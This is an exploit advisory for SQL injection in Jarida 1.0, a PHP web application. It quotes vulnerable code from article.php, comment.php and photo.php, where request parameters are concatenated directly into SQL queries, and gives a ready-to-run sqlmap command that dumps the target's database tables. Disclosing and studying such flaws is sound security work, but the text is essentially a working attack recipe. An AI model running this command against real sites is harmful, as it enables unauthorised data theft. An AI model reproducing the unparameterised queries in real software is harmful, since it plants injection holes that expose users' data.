# Exploit Title: Jarida 1.0 SQL Injection # Date : 26 September 2011 # Author : Ptrace Security (Gianni Gnesa [gnix]) # Contact : research[at]ptrace-security[dot]com # Software Link: http://sourceforge.net/projects/jarida/ # Version : 1.0 # Tested on : CentOS 5.6 [01] ./article.php:28: $query = "SELECT article_id FROM tblArticle WHERE article_id = " . $_GET['id']; => ./sqlmap.py -u http://192.168.109.111/jarida_1.0/article.php?id=1 --dump --tables [02] ./comment.php 36 $name = $_POST['name']; 37 $web = $_POST['web']; 38 $title = $_POST['title']; 39 $body = $_POST['body']; 40 $ip = $_SERVER['REMOTE_ADDR']; 41 $article_id = $_POST['id']; 42 $date = time(); 43 ... 56 57 switch($_POST['type']) 58 { 59 case 'article': 60 $redirect_url = "./article.php?id=" . $_POST['id']; 61 $query = "INSERT INTO tblArticleComment (comment_article_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip) 62 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')"; 63 break; 64 65 case 'photo': 66 $redirect_url = "./photo.php?id=" . $_POST['id']; 67 $query = "INSERT INTO tblPhotoComment (comment_photo_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip) 68 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')"; 69 break; 70 } [03] ./photo.php 39 $query = "SELECT photo_id FROM tblPhoto 40 WHERE photo_id = " . $_GET['id'];